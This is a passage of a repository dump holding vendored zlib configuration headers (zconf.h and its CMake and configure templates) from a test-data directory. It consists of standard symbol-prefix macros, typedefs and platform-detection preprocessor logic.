z_uncompress # define uncompress2 z_uncompress2 # endif # define zError z_zError # ifndef Z_SOLO # define zcalloc z_zcalloc # define zcfree z_zcfree # endif # define zlibCompileFlags z_zlibCompileFlags # define zlibVersion z_zlibVersion /* all zlib typedefs in zlib.h and zconf.h */ # define Byte z_Byte # define Bytef z_Bytef # define alloc_func z_alloc_func # define charf z_charf # define free_func z_free_func # ifndef Z_SOLO # define gzFile z_gzFile # endif # define gz_header z_gz_header # define gz_headerp z_gz_headerp # define in_func z_in_func # define intf z_intf # define out_func z_out_func # define uInt z_uInt # define uIntf z_uIntf # define uLong z_uLong # define uLongf z_uLongf # define voidp z_voidp # define voidpc z_voidpc # define voidpf z_voidpf /* all zlib structs in zlib.h and zconf.h */ # define gz_header_s z_gz_header_s # define internal_state z_internal_state #endif #if defined(__MSDOS__) && !defined(MSDOS) # define MSDOS #endif #if (defined(OS_2) || defined(__OS2__)) && !defined(OS2) # define OS2 #endif #if defined(_WINDOWS) && !defined(WINDOWS) # define WINDOWS #endif #if defined(_WIN32) || defined(_WIN32_WCE) || defined(__WIN32__) # ifndef WIN32 # define WIN32 # endif #endif #if (defined(MSDOS) || defined(OS2) || defined(WINDOWS)) && !defined(WIN32) # if !defined(__GNUC__) && !defined(__FLAT__) && !defined(__386__) # ifndef SYS16BIT # define SYS16BIT # endif # endif #endif /* * Compile with -DMAXSEG_64K if the alloc function cannot allocate more * than 64k bytes at a time (needed on systems with 16-bit int). */ #ifdef SYS16BIT # define MAXSEG_64K #endif #ifdef MSDOS # define UNALIGNED_OK #endif #ifdef __STDC_VERSION__ # ifndef STDC # define STDC # endif # if __STDC_VERSION__ >= 199901L # ifndef STDC99 # define STDC99 # endif # endif #endif #if !defined(STDC) && (defined(__STDC__) || defined(__cplusplus)) # define STDC #endif #if !defined(STDC) && (defined(__GNUC__) || defined(__BORLANDC__)) # define STDC #endif #if !defined(STDC) && (defined(MSDOS) || defined(WINDOWS) || defined(WIN32)) # define STDC #endif #if !defined(STDC) && (defined(OS2) || defined(__HOS_AIX__)) # define STDC #endif #if defined(__OS400__) && !defined(STDC) /* iSeries (formerly AS/400). */ # define STDC #endif #ifndef STDC # ifndef const /* cannot use !defined(STDC) && !defined(const) on Mac */ # define const /* note: need a more gentle solution here */ # endif #endif #if defined(ZLIB_CONST) && !defined(z_const) # define z_const const #else # define z_const #endif #ifdef Z_SOLO # ifdef _WIN64 typedef unsigned long long z_size_t; # else typedef unsigned long z_size_t; # endif #else # define z_longlong long long # if defined(NO_SIZE_T) typedef unsigned NO_SIZE_T z_size_t; # elif defined(STDC) # include typedef size_t z_size_t; # else typedef unsigned long z_size_t; # endif # undef z_longlong #endif /* Maximum value for memLevel in deflateInit2 */ #ifndef MAX_MEM_LEVEL # ifdef MAXSEG_64K # define MAX_MEM_LEVEL 8 # else # define MAX_MEM_LEVEL 9 # endif #endif /* Maximum value for windowBits in deflateInit2 and inflateInit2. * WARNING: reducing MAX_WBITS makes minigzip unable to extract .gz files * created by gzip. (Files created by minigzip can still be extracted by * gzip.) */ #ifndef MAX_WBITS # define MAX_WBITS 15 /* 32K LZ77 window */ #endif /* The memory requirements for deflate are (in bytes): (1 << (windowBits+2)) + (1 << (memLevel+9)) that is: 128K for windowBits=15 + 128K for memLevel = 8 (default values) plus a few kilobytes for small objects. For example, if you want to reduce the default memory requirements from 256K to 128K, compile with make CFLAGS="-O -DMAX_WBITS=14 -DMAX_MEM_LEVEL=7" Of course this will generally degrade compression (there's no free lunch). The memory requirements for inflate are (in bytes) 1 << windowBits that is, 32K for windowBits=15 (default value) plus about 7 kilobytes for small objects. */ /* Type declarations */ #ifndef OF /* function prototypes */ # ifdef STDC # define OF(args) args # else # define OF(args) () # endif #endif #ifndef Z_ARG /* function prototypes for stdarg */ # if defined(STDC) || defined(Z_HAVE_STDARG_H) # define Z_ARG(args) args # else # define Z_ARG(args) () # endif #endif /* The following definitions for FAR are needed only for MSDOS mixed * model programming (small or medium model with some far allocations). * This was tested only with MSC; for other MSDOS compilers you may have * to define NO_MEMCPY in zutil.h. If you don't need the mixed model, * just define FAR to be empty. */ #ifdef SYS16BIT # if defined(M_I86SM) || defined(M_I86MM) /* MSC small or medium model */ # define SMALL_MEDIUM # ifdef _MSC_VER # define FAR _far # else # define FAR far # endif # endif # if (defined(__SMALL__) || defined(__MEDIUM__)) /* Turbo C small or medium model */ # define SMALL_MEDIUM # ifdef __BORLANDC__ # define FAR _far # else # define FAR far # endif # endif #endif #if defined(WINDOWS) || defined(WIN32) /* If building or using zlib as a DLL, define ZLIB_DLL. * This is not mandatory, but it offers a little performance increase. */ # ifdef ZLIB_DLL # if defined(WIN32) && (!defined(__BORLANDC__) || (__BORLANDC__ >= 0x500)) # ifdef ZLIB_INTERNAL # define ZEXTERN extern __declspec(dllexport) # else # define ZEXTERN extern __declspec(dllimport) # endif # endif # endif /* ZLIB_DLL */ /* If building or using zlib with the WINAPI/WINAPIV calling convention, * define ZLIB_WINAPI. * Caution: the standard ZLIB1.DLL is NOT compiled using ZLIB_WINAPI. */ # ifdef ZLIB_WINAPI # ifdef FAR # undef FAR # endif # ifndef WIN32_LEAN_AND_MEAN # define WIN32_LEAN_AND_MEAN # endif # include /* No need for _export, use ZLIB.DEF instead. */ /* For complete Windows compatibility, use WINAPI, not __stdcall. */ # define ZEXPORT WINAPI # ifdef WIN32 # define ZEXPORTVA WINAPIV # else # define ZEXPORTVA FAR CDECL # endif # endif #endif #if defined (__BEOS__) # ifdef ZLIB_DLL # ifdef ZLIB_INTERNAL # define ZEXPORT __declspec(dllexport) # define ZEXPORTVA __declspec(dllexport) # else # define ZEXPORT __declspec(dllimport) # define ZEXPORTVA __declspec(dllimport) # endif # endif #endif #ifndef ZEXTERN # define ZEXTERN extern #endif #ifndef ZEXPORT # define ZEXPORT #endif #ifndef ZEXPORTVA # define ZEXPORTVA #endif #ifndef FAR # define FAR #endif #if !defined(__MACTYPES__) typedef unsigned char Byte; /* 8 bits */ #endif typedef unsigned int uInt; /* 16 bits or more */ typedef unsigned long uLong; /* 32 bits or more */ #ifdef SMALL_MEDIUM /* Borland C/C++ and some old MSC versions ignore FAR inside typedef */ # define Bytef Byte FAR #else typedef Byte FAR Bytef; #endif typedef char FAR charf; typedef int FAR intf; typedef uInt FAR uIntf; typedef uLong FAR uLongf; #ifdef STDC typedef void const *voidpc; typedef void FAR *voidpf; typedef void *voidp; #else typedef Byte const *voidpc; typedef Byte FAR *voidpf; typedef Byte *voidp; #endif #if !defined(Z_U4) && !defined(Z_SOLO) && defined(STDC) # include # if (UINT_MAX == 0xffffffffUL) # define Z_U4 unsigned # elif (ULONG_MAX == 0xffffffffUL) # define Z_U4 unsigned long # elif (USHRT_MAX == 0xffffffffUL) # define Z_U4 unsigned short # endif #endif #ifdef Z_U4 typedef Z_U4 z_crc_t; #else typedef unsigned long z_crc_t; #endif #ifdef HAVE_UNISTD_H /* may be set to #if 1 by ./configure */ # define Z_HAVE_UNISTD_H #endif #ifdef HAVE_STDARG_H /* may be set to #if 1 by ./configure */ # define Z_HAVE_STDARG_H #endif #ifdef STDC # ifndef Z_SOLO # include /* for off_t */ # endif #endif #if defined(STDC) || defined(Z_HAVE_STDARG_H) # ifndef Z_SOLO # include /* for va_list */ # endif #endif #ifdef _WIN32 # ifndef Z_SOLO # include /* for wchar_t */ # endif #endif /* a little trick to accommodate both "#define _LARGEFILE64_SOURCE" and * "#define _LARGEFILE64_SOURCE 1" as requesting 64-bit operations, (even * though the former does not conform to the LFS document), but considering * both "#undef _LARGEFILE64_SOURCE" and "#define _LARGEFILE64_SOURCE 0" as * equivalently requesting no 64-bit operations */ #if defined(_LARGEFILE64_SOURCE) && -_LARGEFILE64_SOURCE - -1 == 1 # undef _LARGEFILE64_SOURCE #endif #ifndef Z_HAVE_UNISTD_H # ifdef __WATCOMC__ # define Z_HAVE_UNISTD_H # endif #endif #ifndef Z_HAVE_UNISTD_H # if defined(_LARGEFILE64_SOURCE) && !defined(_WIN32) # define Z_HAVE_UNISTD_H # endif #endif #ifndef Z_SOLO # if defined(Z_HAVE_UNISTD_H) # include /* for SEEK_*, off_t, and _LFS64_LARGEFILE */ # ifdef VMS # include /* for off_t */ # endif # ifndef z_off_t # define z_off_t off_t # endif # endif #endif #if defined(_LFS64_LARGEFILE) && _LFS64_LARGEFILE-0 # define Z_LFS64 #endif #if defined(_LARGEFILE64_SOURCE) && defined(Z_LFS64) # define Z_LARGE64 #endif #if defined(_FILE_OFFSET_BITS) && _FILE_OFFSET_BITS-0 == 64 && defined(Z_LFS64) # define Z_WANT64 #endif #if !defined(SEEK_SET) && !defined(Z_SOLO) # define SEEK_SET 0 /* Seek from beginning of file. */ # define SEEK_CUR 1 /* Seek from current position. */ # define SEEK_END 2 /* Set file pointer to EOF plus "offset" */ #endif #ifndef z_off_t # define z_off_t long #endif #if !defined(_WIN32) && defined(Z_LARGE64) # define z_off64_t off64_t #else # if defined(_WIN32) && !defined(__GNUC__) # define z_off64_t __int64 # else # define z_off64_t z_off_t # endif #endif /* MVS linker does not support external names larger than 8 bytes */ #if defined(__MVS__) #pragma map(deflateInit_,"DEIN") #pragma map(deflateInit2_,"DEIN2") #pragma map(deflateEnd,"DEEND") #pragma map(deflateBound,"DEBND") #pragma map(inflateInit_,"ININ") #pragma map(inflateInit2_,"ININ2") #pragma map(inflateEnd,"INEND") #pragma map(inflateSync,"INSY") #pragma map(inflateSetDictionary,"INSEDI") #pragma map(compressBound,"CMBND") #pragma map(inflate_table,"INTABL") #pragma map(inflate_fast,"INFA") #pragma map(inflate_copyright,"INCOPY") #endif #endif /* ZCONF_H */ ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zconf.h.cmakein ================================================ /* zconf.h -- configuration of the zlib compression library * Copyright (C) 1995-2016 Jean-loup Gailly, Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* @(#) $Id$ */ #ifndef ZCONF_H #define ZCONF_H #cmakedefine Z_PREFIX #cmakedefine Z_HAVE_UNISTD_H /* * If you *really* need a unique prefix for all types and library functions, * compile with -DZ_PREFIX. The "standard" zlib should be compiled without it. * Even better than compiling with -DZ_PREFIX would be to use configure to set * this permanently in zconf.h using "./configure --zprefix". */ #ifdef Z_PREFIX /* may be set to #if 1 by ./configure */ # define Z_PREFIX_SET /* all linked symbols and init macros */ # define _dist_code z__dist_code # define _length_code z__length_code # define _tr_align z__tr_align # define _tr_flush_bits z__tr_flush_bits # define _tr_flush_block z__tr_flush_block # define _tr_init z__tr_init # define _tr_stored_block z__tr_stored_block # define _tr_tally z__tr_tally # define adler32 z_adler32 # define adler32_combine z_adler32_combine # define adler32_combine64 z_adler32_combine64 # define adler32_z z_adler32_z # ifndef Z_SOLO # define compress z_compress # define compress2 z_compress2 # define compressBound z_compressBound # endif # define crc32 z_crc32 # define crc32_combine z_crc32_combine # define crc32_combine64 z_crc32_combine64 # define crc32_combine_gen z_crc32_combine_gen # define crc32_combine_gen64 z_crc32_combine_gen64 # define crc32_combine_op z_crc32_combine_op # define crc32_z z_crc32_z # define deflate z_deflate # define deflateBound z_deflateBound # define deflateCopy z_deflateCopy # define deflateEnd z_deflateEnd # define deflateGetDictionary z_deflateGetDictionary # define deflateInit z_deflateInit # define deflateInit2 z_deflateInit2 # define deflateInit2_ z_deflateInit2_ # define deflateInit_ z_deflateInit_ # define deflateParams z_deflateParams # define deflatePending z_deflatePending # define deflatePrime z_deflatePrime # define deflateReset z_deflateReset # define deflateResetKeep z_deflateResetKeep # define deflateSetDictionary z_deflateSetDictionary # define deflateSetHeader z_deflateSetHeader # define deflateTune z_deflateTune # define deflate_copyright z_deflate_copyright # define get_crc_table z_get_crc_table # ifndef Z_SOLO # define gz_error z_gz_error # define gz_intmax z_gz_intmax # define gz_strwinerror z_gz_strwinerror # define gzbuffer z_gzbuffer # define gzclearerr z_gzclearerr # define gzclose z_gzclose # define gzclose_r z_gzclose_r # define gzclose_w z_gzclose_w # define gzdirect z_gzdirect # define gzdopen z_gzdopen # define gzeof z_gzeof # define gzerror z_gzerror # define gzflush z_gzflush # define gzfread z_gzfread # define gzfwrite z_gzfwrite # define gzgetc z_gzgetc # define gzgetc_ z_gzgetc_ # define gzgets z_gzgets # define gzoffset z_gzoffset # define gzoffset64 z_gzoffset64 # define gzopen z_gzopen # define gzopen64 z_gzopen64 # ifdef _WIN32 # define gzopen_w z_gzopen_w # endif # define gzprintf z_gzprintf # define gzputc z_gzputc # define gzputs z_gzputs # define gzread z_gzread # define gzrewind z_gzrewind # define gzseek z_gzseek # define gzseek64 z_gzseek64 # define gzsetparams z_gzsetparams # define gztell z_gztell # define gztell64 z_gztell64 # define gzungetc z_gzungetc # define gzvprintf z_gzvprintf # define gzwrite z_gzwrite # endif # define inflate z_inflate # define inflateBack z_inflateBack # define inflateBackEnd z_inflateBackEnd # define inflateBackInit z_inflateBackInit # define inflateBackInit_ z_inflateBackInit_ # define inflateCodesUsed z_inflateCodesUsed # define inflateCopy z_inflateCopy # define inflateEnd z_inflateEnd # define inflateGetDictionary z_inflateGetDictionary # define inflateGetHeader z_inflateGetHeader # define inflateInit z_inflateInit # define inflateInit2 z_inflateInit2 # define inflateInit2_ z_inflateInit2_ # define inflateInit_ z_inflateInit_ # define inflateMark z_inflateMark # define inflatePrime z_inflatePrime # define inflateReset z_inflateReset # define inflateReset2 z_inflateReset2 # define inflateResetKeep z_inflateResetKeep # define inflateSetDictionary z_inflateSetDictionary # define inflateSync z_inflateSync # define inflateSyncPoint z_inflateSyncPoint # define inflateUndermine z_inflateUndermine # define inflateValidate z_inflateValidate # define inflate_copyright z_inflate_copyright # define inflate_fast z_inflate_fast # define inflate_table z_inflate_table # ifndef Z_SOLO # define uncompress z_uncompress # define uncompress2 z_uncompress2 # endif # define zError z_zError # ifndef Z_SOLO # define zcalloc z_zcalloc # define zcfree z_zcfree # endif # define zlibCompileFlags z_zlibCompileFlags # define zlibVersion z_zlibVersion /* all zlib typedefs in zlib.h and zconf.h */ # define Byte z_Byte # define Bytef z_Bytef # define alloc_func z_alloc_func # define charf z_charf # define free_func z_free_func # ifndef Z_SOLO # define gzFile z_gzFile # endif # define gz_header z_gz_header # define gz_headerp z_gz_headerp # define in_func z_in_func # define intf z_intf # define out_func z_out_func # define uInt z_uInt # define uIntf z_uIntf # define uLong z_uLong # define uLongf z_uLongf # define voidp z_voidp # define voidpc z_voidpc # define voidpf z_voidpf /* all zlib structs in zlib.h and zconf.h */ # define gz_header_s z_gz_header_s # define internal_state z_internal_state #endif #if defined(__MSDOS__) && !defined(MSDOS) # define MSDOS #endif #if (defined(OS_2) || defined(__OS2__)) && !defined(OS2) # define OS2 #endif #if defined(_WINDOWS) && !defined(WINDOWS) # define WINDOWS #endif #if defined(_WIN32) || defined(_WIN32_WCE) || defined(__WIN32__) # ifndef WIN32 # define WIN32 # endif #endif #if (defined(MSDOS) || defined(OS2) || defined(WINDOWS)) && !defined(WIN32) # if !defined(__GNUC__) && !defined(__FLAT__) && !defined(__386__) # ifndef SYS16BIT # define SYS16BIT # endif # endif #endif /* * Compile with -DMAXSEG_64K if the alloc function cannot allocate more * than 64k bytes at a time (needed on systems with 16-bit int). */ #ifdef SYS16BIT # define MAXSEG_64K #endif #ifdef MSDOS # define UNALIGNED_OK #endif #ifdef __STDC_VERSION__ # ifndef STDC # define STDC # endif # if __STDC_VERSION__ >= 199901L # ifndef STDC99 # define STDC99 # endif # endif #endif #if !defined(STDC) && (defined(__STDC__) || defined(__cplusplus)) # define STDC #endif #if !defined(STDC) && (defined(__GNUC__) || defined(__BORLANDC__)) # define STDC #endif #if !defined(STDC) && (defined(MSDOS) || defined(WINDOWS) || defined(WIN32)) # define STDC #endif #if !defined(STDC) && (defined(OS2) || defined(__HOS_AIX__)) # define STDC #endif #if defined(__OS400__) && !defined(STDC) /* iSeries (formerly AS/400). */ # define STDC #endif #ifndef STDC # ifndef const /* cannot use !defined(STDC) && !defined(const) on Mac */ # define const /* note: need a more gentle solution here */ # endif #endif #if defined(ZLIB_CONST) && !defined(z_const) # define z_const const #else # define z_const #endif #ifdef Z_SOLO # ifdef _WIN64 typedef unsigned long long z_size_t; # else typedef unsigned long z_size_t; # endif #else # define z_longlong long long # if defined(NO_SIZE_T) typedef unsigned NO_SIZE_T z_size_t; # elif defined(STDC) # include typedef size_t z_size_t; # else typedef unsigned long z_size_t; # endif # undef z_longlong #endif /* Maximum value for memLevel in deflateInit2 */ #ifndef MAX_MEM_LEVEL # ifdef MAXSEG_64K # define MAX_MEM_LEVEL 8 # else # define MAX_MEM_LEVEL 9 # endif #endif /* Maximum value for windowBits in deflateInit2 and inflateInit2. * WARNING: reducing MAX_WBITS makes minigzip unable to extract .gz files * created by gzip. (Files created by minigzip can still be extracted by * gzip.) */ #ifndef MAX_WBITS # define MAX_WBITS 15 /* 32K LZ77 window */ #endif /* The memory requirements for deflate are (in bytes): (1 << (windowBits+2)) + (1 << (memLevel+9)) that is: 128K for windowBits=15 + 128K for memLevel = 8 (default values) plus a few kilobytes for small objects. For example, if you want to reduce the default memory requirements from 256K to 128K, compile with make CFLAGS="-O -DMAX_WBITS=14 -DMAX_MEM_LEVEL=7" Of course this will generally degrade compression (there's no free lunch). The memory requirements for inflate are (in bytes) 1 << windowBits that is, 32K for windowBits=15 (default value) plus about 7 kilobytes for small objects. */ /* Type declarations */ #ifndef OF /* function prototypes */ # ifdef STDC # define OF(args) args # else # define OF(args) () # endif #endif #ifndef Z_ARG /* function prototypes for stdarg */ # if defined(STDC) || defined(Z_HAVE_STDARG_H) # define Z_ARG(args) args # else # define Z_ARG(args) () # endif #endif /* The following definitions for FAR are needed only for MSDOS mixed * model programming (small or medium model with some far allocations). * This was tested only with MSC; for other MSDOS compilers you may have * to define NO_MEMCPY in zutil.h. If you don't need the mixed model, * just define FAR to be empty. */ #ifdef SYS16BIT # if defined(M_I86SM) || defined(M_I86MM) /* MSC small or medium model */ # define SMALL_MEDIUM # ifdef _MSC_VER # define FAR _far # else # define FAR far # endif # endif # if (defined(__SMALL__) || defined(__MEDIUM__)) /* Turbo C small or medium model */ # define SMALL_MEDIUM # ifdef __BORLANDC__ # define FAR _far # else # define FAR far # endif # endif #endif #if defined(WINDOWS) || defined(WIN32) /* If building or using zlib as a DLL, define ZLIB_DLL. * This is not mandatory, but it offers a little performance increase. */ # ifdef ZLIB_DLL # if defined(WIN32) && (!defined(__BORLANDC__) || (__BORLANDC__ >= 0x500)) # ifdef ZLIB_INTERNAL # define ZEXTERN extern __declspec(dllexport) # else # define ZEXTERN extern __declspec(dllimport) # endif # endif # endif /* ZLIB_DLL */ /* If building or using zlib with the WINAPI/WINAPIV calling convention, * define ZLIB_WINAPI. * Caution: the standard ZLIB1.DLL is NOT compiled using ZLIB_WINAPI. */ # ifdef ZLIB_WINAPI # ifdef FAR # undef FAR # endif # ifndef WIN32_LEAN_AND_MEAN # define WIN32_LEAN_AND_MEAN # endif # include /* No need for _export, use ZLIB.DEF instead. */ /* For complete Windows compatibility, use WINAPI, not __stdcall. */ # define ZEXPORT WINAPI # ifdef WIN32 # define ZEXPORTVA WINAPIV # else # define ZEXPORTVA FAR CDECL # endif # endif #endif #if defined (__BEOS__) # ifdef ZLIB_DLL # ifdef ZLIB_INTERNAL # define ZEXPORT __declspec(dllexport) # define ZEXPORTVA __declspec(dllexport) # else # define ZEXPORT __declspec(dllimport) # define ZEXPORTVA __declspec(dllimport) # endif # endif #endif #ifndef ZEXTERN # define ZEXTERN extern #endif #ifndef ZEXPORT # define ZEXPORT #endif #ifndef ZEXPORTVA # define ZEXPORTVA #endif #ifndef FAR # define FAR #endif #if !defined(__MACTYPES__) typedef unsigned char Byte; /* 8 bits */ #endif typedef unsigned int uInt; /* 16 bits or more */ typedef unsigned long uLong; /* 32 bits or more */ #ifdef SMALL_MEDIUM /* Borland C/C++ and some old MSC versions ignore FAR inside typedef */ # define Bytef Byte FAR #else typedef Byte FAR Bytef; #endif typedef char FAR charf; typedef int FAR intf; typedef uInt FAR uIntf; typedef uLong FAR uLongf; #ifdef STDC typedef void const *voidpc; typedef void FAR *voidpf; typedef void *voidp; #else typedef Byte const *voidpc; typedef Byte FAR *voidpf; typedef Byte *voidp; #endif #if !defined(Z_U4) && !defined(Z_SOLO) && defined(STDC) # include # if (UINT_MAX == 0xffffffffUL) # define Z_U4 unsigned # elif (ULONG_MAX == 0xffffffffUL) # define Z_U4 unsigned long # elif (USHRT_MAX == 0xffffffffUL) # define Z_U4 unsigned short # endif #endif #ifdef Z_U4 typedef Z_U4 z_crc_t; #else typedef unsigned long z_crc_t; #endif #ifdef HAVE_UNISTD_H /* may be set to #if 1 by ./configure */ # define Z_HAVE_UNISTD_H #endif #ifdef HAVE_STDARG_H /* may be set to #if 1 by ./configure */ # define Z_HAVE_STDARG_H #endif #ifdef STDC # ifndef Z_SOLO # include /* for off_t */ # endif #endif #if defined(STDC) || defined(Z_HAVE_STDARG_H) # ifndef Z_SOLO # include /* for va_list */ # endif #endif #ifdef _WIN32 # ifndef Z_SOLO # include /* for wchar_t */ # endif #endif /* a little trick to accommodate both "#define _LARGEFILE64_SOURCE" and * "#define _LARGEFILE64_SOURCE 1" as requesting 64-bit operations, (even * though the former does not conform to the LFS document), but considering * both "#undef _LARGEFILE64_SOURCE" and "#define _LARGEFILE64_SOURCE 0" as * equivalently requesting no 64-bit operations */ #if defined(_LARGEFILE64_SOURCE) && -_LARGEFILE64_SOURCE - -1 == 1 # undef _LARGEFILE64_SOURCE #endif #ifndef Z_HAVE_UNISTD_H # ifdef __WATCOMC__ # define Z_HAVE_UNISTD_H # endif #endif #ifndef Z_HAVE_UNISTD_H # if defined(_LARGEFILE64_SOURCE) && !defined(_WIN32) # define Z_HAVE_UNISTD_H # endif #endif #ifndef Z_SOLO # if defined(Z_HAVE_UNISTD_H) # include /* for SEEK_*, off_t, and _LFS64_LARGEFILE */ # ifdef VMS # include /* for off_t */ # endif # ifndef z_off_t # define z_off_t off_t # endif # endif #endif #if defined(_LFS64_LARGEFILE) && _LFS64_LARGEFILE-0 # define Z_LFS64 #endif #if defined(_LARGEFILE64_SOURCE) && defined(Z_LFS64) # define Z_LARGE64 #endif #if defined(_FILE_OFFSET_BITS) && _FILE_OFFSET_BITS-0 == 64 && defined(Z_LFS64) # define Z_WANT64 #endif #if !defined(SEEK_SET) && !defined(Z_SOLO) # define SEEK_SET 0 /* Seek from beginning of file. */ # define SEEK_CUR 1 /* Seek from current position. */ # define SEEK_END 2 /* Set file pointer to EOF plus "offset" */ #endif #ifndef z_off_t # define z_off_t long #endif #if !defined(_WIN32) && defined(Z_LARGE64) # define z_off64_t off64_t #else # if defined(_WIN32) && !defined(__GNUC__) # define z_off64_t __int64 # else # define z_off64_t z_off_t # endif #endif /* MVS linker does not support external names larger than 8 bytes */ #if defined(__MVS__) #pragma map(deflateInit_,"DEIN") #pragma map(deflateInit2_,"DEIN2") #pragma map(deflateEnd,"DEEND") #pragma map(deflateBound,"DEBND") #pragma map(inflateInit_,"ININ") #pragma map(inflateInit2_,"ININ2") #pragma map(inflateEnd,"INEND") #pragma map(inflateSync,"INSY") #pragma map(inflateSetDictionary,"INSEDI") #pragma map(compressBound,"CMBND") #pragma map(inflate_table,"INTABL") #pragma map(inflate_fast,"INFA") #pragma map(inflate_copyright,"INCOPY") #endif #endif /* ZCONF_H */ ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zconf.h.in ================================================ /* zconf.h -- configuration of the zlib compression library * Copyright (C) 1995-2016 Jean-loup Gailly, Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* @(#) $Id$ */ #ifndef ZCONF_H #define ZCONF_H /* * If you *really* need a unique prefix for all types and library functions, * compile with -DZ_PREFIX. The "standard" zlib should be compiled without it. * Even better than compiling with -DZ_PREFIX would be to use configure to set * this permanently in zconf.h using "./configure --zprefix". */ #ifdef Z_PREFIX /* may be set to #if 1 by ./configure */ # define Z_PREFIX_SET /* all linked symbols and init macros */ # define _dist_code z__dist_code # define _length_code z__length_code # define _tr_align z__tr_align # define _tr_flush_bits z__tr_flush_bits # define _tr_flush_block z__tr_flush_block # define _tr_init z__tr_init # define _tr_stored_block z__tr_stored_block # define _tr_tally z__tr_tally # define adler32 z_adler32 # define adler32_combine z_adler32_combine # define adler32_combine64 z_adler32_combine64 # define adler32_z z_adler32_z # ifndef Z_SOLO # define compress z_compress # define compress2 z_compress2 # define compressBound z_compressBound # endif # define crc32 z_crc32 # define crc32_combine z_crc32_combine # define crc32_combine64 z_crc32_combine64 # define crc32_combine_gen z_crc32_combine_gen # define crc32_combine_gen64 z_crc32_combine_gen64 # define crc32_combine_op z_crc32_combine_op # define crc32_z z_crc32_z # define deflate z_deflate # define deflateBound z_deflateBound # define deflateCopy z_deflateCopy # define deflateEnd z_deflateEnd # define deflateGetDictionary z_deflateGetDictionary # define deflateInit z_deflateInit # define deflateInit2 z_deflateInit2 # define deflateInit2_ z_deflateInit2_ # define deflateInit_ z_deflateInit_ # define deflateParams z_deflateParams # define deflatePending z_deflatePending # define deflatePrime z_deflatePrime # define deflateReset z_deflateReset # define deflateResetKeep z_deflateResetKeep # define deflateSetDictionary z_deflateSetDictionary # define deflateSetHeader z_deflateSetHeader # define deflateTune z_deflateTune # define deflate_copyright z_deflate_copyright # define get_crc_table z_get_crc_table # ifndef Z_SOLO # define gz_error z_gz_error # define gz_intmax z_gz_intmax # define gz_strwinerror z_gz_strwinerror # define gzbuffer z_gzbuffer # define gzclearerr z_gzclearerr # define gzclose z_gzclose # define gzclose_r z_gzclose_r # define gzclose_w z_gzclose_w # define gzdirect z_gzdirect # define gzdopen z_gzdopen # define gzeof z_gzeof # define gzerror z_gzerror # define gzflush z_gzflush # define gzfread z_gzfread # define gzfwrite z_gzfwrite # define gzgetc z_gzgetc # define gzgetc_ z_gzgetc_ # define gzgets z_gzgets # define gzoffset z_gzoffset # define gzoffset64 z_gzoffset64 # define gzopen z_gzopen # define gzopen64 z_gzopen64 # ifdef _WIN32 # define gzopen_w z_gzopen_w # endif # define gzprintf z_gzprintf # define gzputc z_gzputc # define gzputs z_gzputs # define gzread z_gzread # define gzrewind z_gzrewind # define gzseek z_gzseek # define gzseek64 z_gzseek64 # define gzsetparams z_gzsetparams # define gztell z_gztell # define gztell64 z_gztell64 # define gzungetc z_gzungetc # define gzvprintf z_gzvprintf # define gzwrite z_gzwrite # endif # define inflate z_inflate # define inflateBack z_inflateBack # define inflateBackEnd z_inflateBackEnd # define inflateBackInit z_inflateBackInit # define inflateBackInit_ z_inflateBackInit_ # define inflateCodesUsed z_inflateCodesUsed # define inflateCopy z_inflateCopy # define inflateEnd z_inflateEnd # define inflateGetDictionary z_inflateGetDictionary # define inflateGetHeader z_inflateGetHeader # define inflateInit z_inflateInit # define inflateInit2 z_inflateInit2 # define inflateInit2_ z_inflateInit2_ # define inflateInit_ z_inflateInit_ # define inflateMark z_inflateMark # define inflatePrime z_inflatePrime # define inflateReset z_inflateReset # define inflateReset2 z_inflateReset2 # define inflateResetKeep z_inflateResetKeep # define inflateSetDictionary z_inflateSetDictionary # define inflateSync z_inflateSync # define inflateSyncPoint z_inflateSyncPoint # define inflateUndermine z_inflateUndermine # define inflateValidate z_inflateValidate # define inflate_copyright z_inflate_copyright # define inflate_fast z_inflate_fast # define inflate_table z_inflate_table # ifndef Z_SOLO # define uncompress z_uncompress # define uncompress2 z_uncompress2 # endif # define zError z_zError # ifndef Z_SOLO # define zcalloc z_zcalloc # define zcfree z_zcfree # endif # define zlibCompileFlags z_zlibCompileFlags # define zlibVersion z_zlibVersion /* all zlib typedefs in zlib.h and zconf.h */ # define Byte z_Byte # define Bytef z_Bytef # define alloc_func z_alloc_func # define charf z_charf # define free_func z_free_func # ifndef Z_SOLO # define gzFile z_gzFile # endif # define gz_header z_gz_header # define gz_headerp z_gz_headerp # define in_func z_in_func # define intf z_intf # define out_func z_out_func # define uInt z_uInt # define uIntf z_uIntf # define uLong z_uLong # define uLongf z_uLongf # define voidp z_voidp # define voidpc z_voidpc # define voidpf z_voidpf /* all zlib structs in zlib.h and zconf.h */ # define gz_header_s z_gz_header_s # define internal_state z_internal_state #endif #if defined(__MSDOS__) && !defined(MSDOS) # define MSDOS #endif #if (defined(OS_2) || defined(__OS2__)) && !defined(OS2) # define OS2 #endif #if defined(_WINDOWS) && !defined(WINDOWS) # define WINDOWS #endif #if defined(_WIN32) || defined(_WIN32_WCE) || defined(__WIN32__) # ifndef WIN32 # define WIN32 # endif #endif #if (defined(MSDOS) || defined(OS2) || defined(WINDOWS)) && !defined(WIN32) # if !defined(__GNUC__) && !defined(__FLAT__) && !defined(__386__) # ifndef SYS16BIT # define SYS16BIT # endif # endif #endif /* * Compile with -DMAXSEG_64K if the alloc function cannot allocate more * than 64k bytes at a time (needed on systems with 16-bit int). */ #ifdef SYS16BIT # define MAXSEG_64K #endif #ifdef MSDOS # define UNALIGNED_OK #endif #ifdef __STDC_VERSION__ # ifndef STDC # define STDC # endif # if __STDC_VERSION__ >= 199901L # ifndef STDC99 # define STDC99 # endif # endif #endif #if !defined(STDC) && (defined(__STDC__) || defined(__cplusplus)) # define STDC #endif #if !defined(STDC) && (defined(__GNUC__) || defined(__BORLANDC__)) # define STDC #endif #if !defined(STDC) && (defined(MSDOS) || defined(WINDOWS) || defined(WIN32)) # define STDC #endif #if !defined(STDC) && (defined(OS2) || defined(__HOS_AIX__)) # define STDC #endif #if defined(__OS400__) && !defined(STDC) /* iSeries (formerly AS/400). */ # define STDC #endif #ifndef STDC # ifndef const /* cannot use !defined(STDC) && !defined(const) on Mac */ # define const /* note: need a more gentle solution here */ # endif #endif #if 